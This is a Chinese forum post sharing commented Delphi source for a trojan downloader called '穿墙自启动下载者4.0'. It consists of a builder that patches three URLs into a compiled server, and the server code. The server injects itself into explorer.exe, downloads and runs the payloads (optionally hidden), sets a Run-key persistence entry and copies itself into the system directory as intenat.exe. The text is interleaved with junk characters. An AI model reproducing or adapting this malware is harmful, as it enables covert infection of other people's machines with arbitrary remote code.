[分享] 穿墙自启动下载者4.0 delphi源码详细注释

生成器
`& D$ J+ h$ Kunit Unit1;7 x3 B- r& h; |. ]
, x9 c7 f4 T! Y0 m, s
interface3 }# Q+ \( f& I7 U k( F( x' K
6 U& v7 ]! i7 A
uses' d( [1 V% n! y& ^" m- W1 r
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
/ i5 i' L% B9 @4 u. t; y% a. _9 CDialogs, StdCtrls, ExtCtrls; //调用的单元，
6 Z9 t7 |; H# _( N4 J t, k
+ W" ]0 B% A3 x7 P4 |8 H. v4 jconst
) x* j- U% F( L& U0 Q- A% LOFFSET_URL = 29548; //下载地址偏移 1
; b# i% Z6 P l2 Y+ g+ K, YOFFSET_URL2 = 29616; //下载地址偏移 2
8 h) b% N; N3 ?OFFSET_URL3 = 29684; //下载地址偏移 3
# l( h |- I$ B# ^3 ^* W) U$ C
6 r+ R2 H" P5 h' ?; m0 I& G2 B1 q5 A$ J. W0 s
{计算方法是用C32ASM打开编译得服务端即server.exe，搜索- m6 \ i. A2 h2 ~" y& ^2 A
server中
* \: ~6 r' N: e# |. W: @8 u( [var6 X4 ]4 c" U3 Y3 n( k i/ `
url: pchar =' ';
2 d- Z W& s* d! gurl2: pchar =' ';
& [3 ?; l9 M$ lurl3: pchar =' ';. I* z# @, ^& X9 o1 @) ~
三个变量得位置，搜索方法直接搜索一堆空格，就能找到，如果你怕找不好，可以把上面" E- D# g+ ?5 g/ u3 U9 \
pchar =' ';
) l' b) K. R+ a 里面换作pchar ='http:// ';# |- z1 a$ [7 c2 b8 ]; M
搜索http://即可，搜索到位置后，转换成10进制写在类似29548等的位置}
5 o) [3 h% ~. y3 p( O
- T4 w; S1 ^! j& Q& a/ j
7 T$ {9 r9 }' t% s
; o8 y) u" g' o2 b' B8 U+ e% {type
3 d5 @2 p: b3 M U3 N# d! @7 XTForm1 = class(TForm)
' P& m# ~0 J: ~4 z" f3 |( e Label1: TLabel;0 }, l/ E2 X4 j' j( C' [7 v5 w
EdtUrl: TEdit;/ q" a6 z; I8 V5 `% e
Button1: TButton;
+ A, y$ v+ E5 k" j9 D8 Y2 n8 N Button2: TButton;9 I5 e' p v; ]* |7 I
Label3: TLabel;
?5 _- ~4 `1 Y. l$ C3 p) g Label4: TLabel;
, ], D2 i# t; _- } Edit1: TEdit;. K) F6 j3 ~" e8 z
Label5: TLabel;
6 c6 M# y3 S, ^7 b3 t Edit2: TEdit;
9 ~' Y/ X8 U. e4 H Label2: TLabel;- m: m1 y1 k0 S+ ?
Label7: TLabel;+ i; f6 m# Y- h' V1 ^+ d/ z+ X
procedure Button2Click(Sender: TObject);
. e; n7 c. X+ \' B. t2 i procedure Button1Click(Sender: TObject);
/ f. E8 B- B4 \' U* ?+ K2 W( f# J/ E" n# \/ @" U% e: X+ G! D$ w
private. s: k. h# \; R# a& V; r8 t
{ Private declarations }9 T: K9 R: u% j' T- x2 l1 H
public
, a' w2 J. @) d# n1 O" r { Public declarations }& T; S7 C8 ]2 z+ y7 l5 H S# \. q4 o
end;
: k+ e' q; O" }
' T4 ~) Z, g3 u& B2 q X0 }& b" Hvar: V7 S- e ^6 b! I
Form1: TForm1;% D/ x- ^, ?0 g G+ L

: a$ B' R, ]4 }* O. simplementation5 H, b- X0 r# D. _7 ~
$ d1 z- q* b/ m8 Y' b) v
{$R *.dfm}) i+ a# T& C3 Y- K# h9 b3 H
{上面一堆代码是DELPHI自动添加的，Var 是定义全局变量的位置,需要加啥自己加，如果不想修改就那么放着好了}6 G `8 T9 ]$ e2 c0 R8 `8 ]
$ g" i) A* l' I2 N8 l
procedure TForm1.Button2Click(Sender: TObject);( N6 B# R1 x j' `
begin% d8 \* ?$ f. o) W
close;
& f+ |9 k0 s* @end;! g6 h* U7 e' ^0 y
//按钮button2按下关闭
8 q/ X f4 P" Nprocedure TForm1.Button1Click(Sender: TObject);
. u: D3 M$ b8 U+ u5 v( K7 U: hvar/ a0 {; A3 m& ?: {$ D+ L
WriteBuff, ResultFilePath, ResourcePointer: PChar;
, F$ L* D' o$ ?6 ]7 T, D5 ?0 l4 j- SResourceLocation: HRSRC;8 N5 d! |6 H! R# v7 V
ResourceSize, BytesWritten: Longword;4 s9 X2 d5 f2 C$ n# m/ ^; K0 u
ResDataHandle: THandle;
1 I/ s% b) `7 a3 F8 B+ M3 O+ xFileHandle: THandle;2 y: Z% S) f# D( U0 c5 m X
sf:TSaveDialog;
1 s0 N9 i, X3 j' @/ l7 Z5 Q; IUrl,Url2,Url3:string; //这儿是重点，必须定义，其他的不需要改动- O5 J+ T8 O4 \ e: a
begin1 c: a4 v0 f& X7 A% }
if trim(EdtUrl.Text)='' then2 I! b0 y, L: y+ d& d9 p
begin
# k% n! U6 k4 j Application.MessageBox(pchar('请输入下载地址！'), '提示信息', mb_iconinformation);
/ w& b2 g& c( b% t$ ?; H exit;
9 K; R8 L# _- R8 mend;7 _/ N8 |. Y r
//地址为空时提示
. L: k5 Q) u9 I! O3 }; c# zsf :=TSaveDialog.Create(Application);
0 x1 X; ^ B$ t* j: _sf.DefaultExt :='exe';+ p3 P. A) h6 p! K
sf.Title :='生成';# Z* n4 \! l7 f- {8 w
if not sf.Execute then exit;% @: A4 U" _% M. O: V% F6 D* @: z
Url :=trim(EdtUrl.Text); //trim函数去掉空格，取得编辑框输入的内容
1 g" q5 E. T* {Url2 :=trim(Edit1.Text); //同上
% h0 H7 W1 d8 l7 I, P* WUrl3 :=trim(Edit2.Text); //同上$ V: h0 T( j) L$ [7 e( x
ResultFilePath := pchar(sf.FileName);
0 K; g* v- H7 c) m! _/ cResourceLocation := FindResource(HInstance, 'urlmm', RT_RCDATA); //用资源RCDATA中urlmm资源# B& b( D2 P* D- }9 r
if ResourceLocation <> 0 then" {: ]0 B' [& W0 y1 s
begin
/ V& P3 K9 `' ~* H9 D ResourceSize := SizeofResource(HInstance, ResourceLocation);8 {) Z; v# O: F
if ResourceSize <> 0 then
; u( Y. c4 N ], ^) f4 u7 h begin
0 ?4 S- t1 Q1 J: ~9 l" M ResDataHandle := LoadResource(HInstance, ResourceLocation);! s$ _( o! ?% J7 V; T
if ResDataHandle <> 0 then* r3 A/ Y' \: Y
begin
$ `; i& S b2 T- ^6 ~ ResourcePointer := LockResource(ResDataHandle);6 F- H; x# V. E7 {% L" r
if ResourcePointer <> nil then
; I" H9 z" O2 [$ y3 r( y begin
! P( u' P P: b FileHandle := CreateFile(ResultFilePath, GENERIC_WRITE, FILE_SHARE_WRITE, nil, Create_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);& A u5 {$ a: E
if FileHandle <> INVALID_HANDLE_VALUE then
5 \. O* K5 l; Y" G t: [ begin( O9 N7 v+ u# v" H
WriteFile(FileHandle, ResourcePointer^, ResourceSize, BytesWritten, nil);
! Y. ]4 i3 [, z9 q Sleep(10);
3 F- w% H, R' K% z3 o; Q //看好下面三段，写入偏移的重点，48是长度，49是中止长度，你空格多长，这里就多长
' l- l, E8 _* i, G //三段写入了3个地址! d! V2 h6 A9 H- C T3 C0 r4 |
SetFilePointer(FileHandle, OFFSET_URL, nil, FILE_BEGIN);- t0 ~' x. e& T, G
WriteBuff := PChar(Url + StringOfChar(#0, 48 - Length(Url)));
5 S# u4 w- l; H WriteFile(FileHandle, WriteBuff^, 49, BytesWritten, nil);
+ j3 e3 y. k- u% G7 m/ g& i2 q& E# T7 ?2 G
SetFilePointer(FileHandle, OFFSET_URL2, nil, FILE_BEGIN);
. x0 G: B f1 @+ ? w+ F WriteBuff := PChar(Url2 + StringOfChar(#0, 48 - Length(Url2)));8 ^; C A: R- ]( Q I: l8 @
WriteFile(FileHandle, WriteBuff^, 49, BytesWritten, nil);, g Y. T) d8 C, }# m5 E

- `: s- w9 b- `: |. K; a2 q SetFilePointer(FileHandle, OFFSET_URL3, nil, FILE_BEGIN);
$ Q9 e# B3 `5 l WriteBuff := PChar(Url3 + StringOfChar(#0, 48 - Length(Url3)));
" D) t+ x3 Y1 ?6 Y. q0 ]' ^6 }; j WriteFile(FileHandle, WriteBuff^, 49, BytesWritten, nil);
+ J- G9 M2 H" w" L- f7 D* ^1 D0 R: t" M# Q# w

1 c! W5 x- c9 n) c; w# p- ? CloseHandle(FileHandle); //这个一定不能少$ _) i' ?- c2 H, V, a/ D
MessageBox(0, '配置文件成功', '提示', mb_iconinformation);; x! j9 P# N. b0 O+ M+ ^3 \1 {
end;
# T' Q& I4 N+ {2 w" u l- a: e end;/ G2 D: c$ ~/ s b( \
end;$ y! q; I: a- X2 C
end;
, h! ?5 J5 e6 w' X* B8 @end;9 Y& t) \: [ U7 ]6 c! e
end;
* }& j# @: Z# S4 e7 |. r/ ~6 n6 y: p: W2 d$ i

/ V0 j) t1 w4 D' ^program server;
+ A+ ]; e' W8 H, r9 m; V! h$ f/ ^8 e; } |( `
{$IMAGEBASE $13140000}
! C2 v; {$ A; E2 C+ d) M& Y2 k
$ Q9 E/ s, N0 V6 y! vuses. k1 y' M) f( b, A$ W
Windows,# N. [/ A3 q- p- e- D: I
SysUtils,3 P9 |% g# e' b
urlmon, //下载单元 ，这个改api减少体积不多( m. W, i) o, S
Registry; //注册表单元,这个可以改成api，会减少很多体积8 |5 @2 C. J: g" r. e" ^( ~
var! j( `9 J2 Q1 W& b1 E6 \+ W( Q
url: pchar =' '; //依次3个留出了生成器写入下载地址的位置
# G8 k6 T7 X i0 g9 Y6 s url2: pchar =' ';8 [7 `8 H+ E, M/ L" y) E K
url3: pchar =' ';4 C! o$ ~7 O- v# [% ]
procedure Download; //下载过程
- u% U3 F2 b. D1 ]. Rbegin& Y, }3 ~* o7 J0 z- L
URLDownloadToFile(nil, url, 'C:\windows\temp\system.exe', 0, nil); //下载文件$ ]' a( [( [. t- r4 _" c' x- {
WinExec('C:\windows\temp\system.exe', SW_SHOW); //SW_SHOW or SW_HIDE //执行文件 sw_show是显示运行，sw_hide是隐藏运行, @ G3 v3 `: t$ } q4 M
7 {. `; w9 A& @7 Q& v' l
URLDownloadToFile(nil, url2, 'C:\windows\temp\system2.exe', 0, nil);
4 Z5 F+ x; `8 k' FWinExec('C:\windows\temp\system2.exe', SW_SHOW); //SW_SHOW or SW_HIDE //winexec可以用api写，减少体积
5 B2 i- I2 g3 v# e4 L o2 u9 w# [* ^" a" z0 K9 h
URLDownloadToFile(nil, url3, 'C:\windows\temp\system3.exe', 0, nil);9 G/ y7 I; i( S
WinExec('C:\windows\temp\system3.exe', SW_SHOW); //SW_SHOW or SW_HIDE7 P! S# N8 A( M6 V% q% m7 J
end;# W; G: _+ z6 Z

' v# X" G* c. M# V) |1 kvar
b( M& c4 a. r) W5 p' V5 Y- ]hModule, hModule_News: Pointer;
8 S% Q. ~* ~9 o, [Extent, Size, ThreadId: longword;' l* F+ Y3 o8 g2 T
ProcessHandle, Pid: longword;4 J v) g8 T: v7 M/ ]) w- U, \
reg:TRegistry;0 K- s1 u9 l. e
sysdir:array[0..50] of char;5 t4 R9 l+ D' {* O+ `& {

; _/ a- @+ b; q! xbegin- R. c% z. Y1 ?! F% w
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);# n4 }6 Y; N& H g' m& Z7 \3 D
//获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看
$ ?# x X2 X0 I" Q' t. S
; {* |6 m i$ R7 PProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, Pid); //打开进程! P3 ]- g, t* m5 k1 d0 f
0 ?$ ?5 b3 L( k) g6 d& g" W y/ ~
hModule := Pointer(GetModuleHandle(nil));
2 A3 A6 s4 t7 _9 ~6 A//这里得到的值为一个返回一个指针型变量,指向内容包括自身映像的基址和长度
( H7 w) T/ M: `5 a; h" ?( o3 M0 D1 T
Extent := PImageOptionalHeader(Pointer(integer(hModule) +PImageDosHeader(hModule)._lfanew + SizeOf(dword) +SizeOf(TImageFileHeader))).SizeOfImage;
1 j0 ~% g# ?9 k; j! i( j; `& p//得到内存映像的长度
9 F, g4 V6 w7 ]6 Z
( k u/ c! t/ b" J2 zVirtualFreeEx(ProcessHandle, hModule, 0, MEM_RELEASE);" f5 L0 [, I0 d' k
//在Exp进程的内存范围内分配一个足够长度的内存& ^# v. J1 i6 I

1 y8 t/ o6 ?. R) ]* lhModule_News := VirtualAllocEx(ProcessHandle, hModule, Extent, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);8 c7 Z$ a5 N& u! k5 v
//确定起始基址和内存映像基址的位置& z: t9 R% y$ ]6 }! S1 J& @

8 V; J8 l2 d, R2 }" x5 ~' z: AWriteProcessMemory(ProcessHandle, hModule_News, hModule, Extent, Size);8 n- N% k/ }* ?! I" U
//确定上面各项数据后,这里开始进行操作
4 |: [4 P( N8 _' _- J( ` Z9 q( p$ e2 h3 P9 H7 @4 S6 h* M4 @* \& H
CreateRemoteThread(ProcessHandle, nil, 0, @Download, hModule, 0, ThreadId);- k/ f: V9 d1 g' x6 H. o
//建立远程线程,至此注入过程完成: e% N8 q' T% k- }; Y9 ?# B

]' U& ^2 `: I# M6 w# P& ~CloseHandle(ProcessHandle);
. \2 D2 P% @& e( O+ w# b//关闭对像0 N# @; E7 ]: c; l; z9 ^) F
6 d( T: i) c) N7 H
{上面这段代码是插进程explorer.exe}; `) a& V* i5 b, ]
begin5 c5 z( x2 K* h( a$ {6 ?) t3 S
Reg := TRegistry.Create;
/ M/ m2 [: v3 M' j3 ^5 N0 v( G( eTry0 T8 h' t- b" G7 A/ B$ B* {) k
Reg.RootKey := HKEY_LOCAL_MACHINE;! `" Z1 d! p+ I8 i% k5 U1 j3 A
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', True);
% a, p1 w! x5 t& v: e Reg.WriteString('system', 'intenat.exe'); //写入数据# O/ ~" h7 Y: H. V x" y% w
Reg.CloseKey;
% y% \& j' N* P S% n. aFinally
$ n# ? ?0 M3 \& @5 s) C" C Reg.Free;0 z8 j) L6 `" D* W
End;
0 s9 ^: P3 N8 R" ^( C//上面是写注册表代码! }8 K/ s- H9 b9 V6 ?5 ?+ P
GetSystemDirectory(sysdir,50); //获取系统目录，赋给sysdir变量 ，getwindowsdirectory是获取windows目录( X+ P3 j# o% S* @: E3 K" S; T1 P
if not FileExists(sysdir+'\intenat.exe') then //如果系统目录下不存在intenat.exe则执行
5 t4 y% v5 j2 @7 [ copyfile(pchar(paramstr(0)),pchar(sysdir+'\intenat.exe'),true); //复制自身到系统目录下，名字是intenat.exe5 C2 s' r5 A2 [# m
8 H6 D" I% t* [# z. D& H. d
end; r$ O: `1 z3 s1 b
end.2 f/ C0 q$ ]9 t F
' f" O- z2 B! M8 p. f; j
% z# s* {+ S; @! R: N8 [0 F9 d
end.